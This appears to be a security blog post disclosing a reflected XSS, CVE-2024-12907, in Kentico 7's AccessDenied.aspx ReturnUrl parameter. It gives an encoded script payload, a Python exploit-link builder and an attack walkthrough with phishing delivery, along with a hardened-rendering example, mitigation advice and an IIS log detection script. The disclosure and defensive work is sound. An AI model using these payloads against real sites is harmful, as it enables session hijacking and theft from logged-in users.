A critical security vulnerability, CVE-2024-12907, has been found in Kentico CMS version 7. It lets attackers perform a reflected Cross-Site Scripting (XSS) attack simply by crafting a special link to the /CMSMessages/AccessDenied.aspx endpoint; the flaw is triggered through a single GET parameter. An attacker who can get a logged-in user to open such a link can run script in that user's browser session: hijack the session, display fake forms, or steal sensitive data.

This post breaks down how the vulnerability works, how it can be exploited, and what you can do if you're still running an old instance of Kentico 7. No fancy jargon—plain English and straight to the point.

Background: What's at Risk?

Kentico is a popular .NET-based CMS used by many companies worldwide. Version 7 was released back in 2012 and reached end-of-life in 2016. It *does not receive security updates anymore*. If your website is still on Kentico 7, it has not just this bug but likely many more.

Testing shows Kentico 8 and newer are NOT affected by this vulnerability.

The Vulnerability

The core of CVE-2024-12907 is in how Kentico 7's /CMSMessages/AccessDenied.aspx page handles the ReturnUrl query parameter on GET requests. The page does not encode the value before writing it into its HTML, so an attacker can inject JavaScript that runs in the browser of anyone who opens the malicious link.

- The attacker crafts a URL containing a specially encoded payload in the ReturnUrl parameter.
- When a victim clicks the link, Kentico 7's Access Denied page decodes the payload and echoes it back inside the page, unsanitized.

Example Vulnerable Request

https://victim-website.com/CMSMessages/AccessDenied.aspx?ReturnUrl=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- ReturnUrl is the parameter being abused.
- The decoded payload "><script>alert('xss')</script> is echoed into the page and executed when it loads.

import urllib.parse

# Base URL of the vulnerable Access Denied page (victim-website.com is a placeholder)
target_url = "https://victim-website.com/CMSMessages/AccessDenied.aspx"
# The "> prefix closes the attribute the value is echoed into before the script tag starts
payload = '"><script>alert(document.domain)</script>'
params = {'ReturnUrl': payload}

# urlencode percent-encodes the payload so it survives as a single query value
exploit_link = f"{target_url}?{urllib.parse.urlencode(params)}"
print("Exploit Link:", exploit_link)

When someone visits exploit_link, the JavaScript runs in their browser.
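To make the mechanism and its fix concrete, here is an added Python example; it is not Kentico's code and does not reproduce the real page. render_vulnerable mimics the flawed behaviour (URL-decode ReturnUrl and write it straight into an href attribute), encode_only shows that HTML-attribute encoding on output alone stops the attribute break-out, and render_hardened adds validation of ReturnUrl as a local relative path in front of the encoding. The function names and the constructed payload are assumptions for illustration.

```python
import html
from urllib.parse import unquote, urlsplit

# Constructed payload: the same break-out string the exploit link above carries.
PAYLOAD = '"><script>alert(document.domain)</script>'


def render_vulnerable(return_url: str) -> str:
    """Mimics the flawed behaviour: the ReturnUrl value is URL-decoded and
    written straight into an href attribute with no HTML encoding, so a
    leading "> closes the attribute and the tag and starts a <script> block."""
    value = unquote(return_url)
    return f'<a href="{value}">Go back</a>'


def encode_only(return_url: str) -> str:
    """Output encoding alone: html.escape turns " < > into entities, so the
    value can no longer leave the attribute. It still accepts an absolute
    URL (an open redirect), which is why validation is layered on below."""
    value = unquote(return_url)
    return f'<a href="{html.escape(value, quote=True)}">Go back</a>'


def safe_return_url(return_url: str, default: str = "/") -> str:
    """Accept only a local, site-relative path for ReturnUrl. Anything with a
    scheme or host (javascript:, //evil.example), or with markup or control
    characters, falls back to the default landing page."""
    value = unquote(return_url or "")
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default
    if not value.startswith("/") or value.startswith("//"):
        return default
    if any(ch in value for ch in '<>"\'\r\n\x00'):
        return default
    return value


def render_hardened(return_url: str) -> str:
    """Validate first, then encode on output: two independent controls."""
    value = safe_return_url(return_url)
    return f'<a href="{html.escape(value, quote=True)}">Go back</a>'


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("encoded   :", encode_only(PAYLOAD))
    print("hardened  :", render_hardened(PAYLOAD))
```

Running the block prints the raw injected markup for the vulnerable path, an entity-encoded (harmless) attribute for the encode-only path, and a plain link to / for the hardened path. The validation step matters on its own: without it, an encoded but absolute ReturnUrl still turns the Access Denied page into an open redirector.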

Walkthrough: Step-by-Step Attack

*Assume the attacker knows you're using Kentico 7.*

1. Create the payload: pick a script to run in the victim's browser, for example <script>stealCookie()</script> (stealCookie stands for whatever the attacker wants to execute), and prefix it with "> so that it closes the attribute the value is echoed into.
2. Build the link: URL-encode the payload and put it in the ReturnUrl parameter:

/CMSMessages/AccessDenied.aspx?ReturnUrl=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

3. Deliver the link to a logged-in user, typically by phishing.
4. When the victim opens it, the script runs in the site's origin and can read what the page can read (session cookies unless they are HttpOnly), show fake forms, deface pages, or perform any action the logged-in user can do.

Since victims only need to click a link, this is *very easy* to pull off, especially in a targeted phishing campaign.

References

- Kentico 7 End of Life Notice
- OWASP: Reflected XSS
- CVE Details for Kentico

*(CVE entry to be published at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12907 once available)*

Recommendations

1. Upgrade: The only safe long-term fix is to move to a supported Kentico version (8 or newer), following Kentico's official upgrade documentation.
2. Block Old Endpoints: If the normal access-denied flow can tolerate it, block /CMSMessages/AccessDenied.aspx at the reverse proxy or serve a static page in its place, so the vulnerable handler is never reached.
3. Sanitize Inputs: If you can't upgrade immediately, add a WAF rule that rejects requests to /CMSMessages/AccessDenied.aspx whose ReturnUrl, after URL-decoding (including double-encoded forms), contains markup characters (<, >, ", ') or a javascript:/data: scheme, or patch the page so ReturnUrl is validated as a local relative path and HTML-encoded on output.
4. Monitor for Abuse: Watch IIS logs for requests to /CMSMessages/AccessDenied.aspx whose ReturnUrl carries encoded markup (%3C, %3E, %22) or a script scheme; repeated hits from one client are a strong signal of probing.
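For the monitoring and WAF recommendations above, here is an added detection example, not Kentico's or the author's code. It scans IIS W3C log lines for requests to /CMSMessages/AccessDenied.aspx whose ReturnUrl, after full URL-decoding, contains markup characters or a script scheme. The log lines are constructed sample data, the field list assumes the default IIS W3C format, and the function names are mine.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in IIS W3C extended log format (not real traffic).
# Three requests from 198.51.100.7 carry injection attempts: a plain payload,
# a double-encoded one, and a javascript: scheme in a mixed-case parameter.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2025-01-02 16:15:07 10.0.0.5 GET /CMSMessages/AccessDenied.aspx ReturnUrl=%2FHome.aspx 443 - 203.0.113.10 Mozilla/5.0 200
2025-01-02 16:15:09 10.0.0.5 GET /CMSMessages/AccessDenied.aspx ReturnUrl=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E 443 - 198.51.100.7 Mozilla/5.0 200
2025-01-02 16:15:11 10.0.0.5 GET /CMSMessages/AccessDenied.aspx ReturnUrl=%2522%253E%253Cscript%253E 443 - 198.51.100.7 Mozilla/5.0 200
2025-01-02 16:15:12 10.0.0.5 GET /CMSMessages/AccessDenied.aspx returnurl=javascript:alert(1) 443 - 198.51.100.7 Mozilla/5.0 200
2025-01-02 16:15:13 10.0.0.5 GET /CMSPages/GetResource.ashx scriptfile=site.js 443 - 203.0.113.10 Mozilla/5.0 200
"""

TARGET_STEM = "/cmsmessages/accessdenied.aspx"
MARKUP_CHARS = set('<>"\'')
SCRIPT_SCHEME = re.compile(r"^\s*(javascript|data|vbscript):", re.IGNORECASE)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, so %2522 (a double-encoded
    quote) is seen as the quote it becomes after the server's own decoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_return_url(value: str):
    """Return a reason string if the decoded ReturnUrl looks like an injection
    attempt, or None for a benign local path."""
    decoded = fully_decode(value)
    if SCRIPT_SCHEME.match(decoded):
        return "script-scheme"
    if MARKUP_CHARS & set(decoded):
        return "markup-chars"
    return None


def parse_w3c(log_text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()  # IIS replaces spaces inside a field with '+'
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_access_denied_xss(log_text: str):
    """Scan the log for AccessDenied.aspx requests with a suspicious ReturnUrl."""
    hits = []
    for rec in parse_w3c(log_text):
        if rec["cs-uri-stem"].lower() != TARGET_STEM:
            continue
        query = parse_qs(rec["cs-uri-query"], keep_blank_values=True)
        for name, values in query.items():
            if name.lower() != "returnurl":  # ASP.NET matches query names case-insensitively
                continue
            for raw in values:
                reason = classify_return_url(raw)
                if reason:
                    hits.append({
                        "time": f"{rec['date']} {rec['time']}",
                        "client": rec["c-ip"],
                        "value": fully_decode(raw),
                        "reason": reason,
                    })
    return hits


if __name__ == "__main__":
    for hit in find_access_denied_xss(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['reason']}: {hit['value']!r}")
```

The benign /Home.aspx request and the unrelated GetResource.ashx line are left alone; the three probes from 198.51.100.7 are reported. The same classify_return_url predicate is what a WAF rule in front of the endpoint should implement, and decoding to a fixed point is what keeps double-encoded payloads from slipping past it.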

Conclusion

CVE-2024-12907 is an easy-to-exploit reflected XSS affecting any site still running Kentico CMS version 7. The only secure path forward is to migrate off Kentico 7 as soon as you can. If you're stuck, take every possible step to mitigate and monitor: the bug is public and trivial to weaponize in a phishing link.

Stay safe and patch your systems!


Timeline

Published on: 01/02/2025 16:15:07 UTC